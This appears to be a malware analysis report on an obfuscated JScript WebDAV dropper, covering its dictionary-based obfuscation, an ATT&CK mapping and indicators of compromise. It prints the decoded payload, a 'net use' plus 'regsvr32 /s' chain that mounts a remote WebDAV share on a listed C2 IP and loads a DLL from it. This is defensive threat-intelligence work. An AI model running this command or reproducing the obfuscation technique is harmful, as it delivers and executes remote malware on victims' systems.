familyunclassified-js-webdav-dropperconfidencehighcreated2026-07-25
SHA-256: 26666aa20903faa5a1c72b35c4207121fd3e924ad8eecb5d25dbd4cd3b3b8694

26666aa2 — Unclassified JS WebDAV Dropper (104th Sibling)

Build / RE

Language: JScript (Windows Script Host), single-line flattened ASCII text, 1.2 MB, no line terminators. ^[file.txt]

Obfuscation dialect: JScript dictionary lookup-table with extreme variable-name padding — 62 key/value pairs mapping random noise keys (8–20 chars) to single ASCII characters (A–Z, a–z, 0–9), stored as properties of a single object variable with a 597-character noise-string name (irrupownist...stuffsuperstare). ^[floss.txt] ^[strings.txt:1]

Assembly engine: The 597-char variable name is declared as =[];, then 62 assignments populate it (var['noise_key']='X';). Two Function(''+var['key']+...) constructors decode strings via concatenation:

  1. First block (10 keys) → "returnthis" — used to build Function('return this')() for global object access. ^[floss.txt:89]
  2. Second block (336 keys) → full PowerShell command: WScript.CreateObject("WScript.Shell").Run("powershell -EncodedCommand ..."). ^[floss.txt:112]

Decoded payload (base64 → UTF-16LE): net use \\94.159.113.79@8888\davwwwroot\;regsvr32 /s \\94.159.113.79@8888\davwwwroot\254952309424271.dll ^[floss.txt:145]

Anti-analysis: None. No debugger checks, VM detection, time gates, sandbox gates, or nested try/catch decoys. ^[capa.txt]

Code quality: Low — hand-written, repetitive, verbose. No commercial obfuscator signatures. The 597-char variable name and 1.2 MB file size are pure padding; functional payload is ~300 bytes of decoded JavaScript.

Deploy / ATT&CK

Tactic Technique Evidence
Execution T1059.005 (Visual Basic / JScript) .js file executed by WScript; JScript dictionary assembly ^[floss.txt]
Execution T1059.001 (PowerShell) PowerShell -EncodedCommand wrapper (base64 UTF-16LE) ^[floss.txt:112]
Execution T1218.010 (Regsvr32) regsvr32 /s \\94.159.113.79@8888\davwwwroot\254952309424271.dll ^[floss.txt:145]
Defense Evasion T1218 (System Binary Proxy Execution) wscript.exe → powershell.exe → regsvr32.exe chain ^[floss.txt]
Defense Evasion T1027 (Obfuscated Files or Information) 62-entry dictionary lookup table with 597-char variable-name padding ^[strings.txt:1]
Command & Control T1071.001 (Web Protocols) WebDAV over HTTP on \\94.159.113.79@8888\DavWWWRoot\ ^[floss.txt:145]
Command & Control T1105 (Ingress Tool Transfer) net use mounts WebDAV share; regsvr32 fetches and loads remote DLL ^[floss.txt:145]

C2 Infrastructure: WebDAV endpoint 94.159.113.79:8888 — fifth confirmed sibling on this IP (after 68th fe261d49, 74th be172014, 79th dc76a67d, and 102nd 9665f822). Payload filename: 254952309424271.dll. No decoy, no timeout gate, no sandbox gate, no batch/polyglot layer.

Attribution: High-confidence sibling of the unclassified-js-webdav-dropper family (n=104). Same 62-entry dictionary cardinality, same Function('return this')() assembly engine, same WebDAV + regsvr32 execution chain, same 94.159.113.x C2 subnet. Structural match to the 62-entry noise-key dictionary dialect observed across 80+ prior siblings.

IOCs

  • C2: 94.159.113.79:8888 (WebDAV)
  • Payload: 254952309424271.dll
  • Execution: regsvr32 /s \\94.159.113.79@8888\davwwwroot\254952309424271.dll
  • Staging: net use \\94.159.113.79@8888\davwwwroot\

Notes

  • Static-only analysis; CAPE skipped because sample is ASCII JScript, not a supported binary class. ^[dynamic-analysis.md]
  • No orphan wikilinks in this report. All *...* references point to existing pages.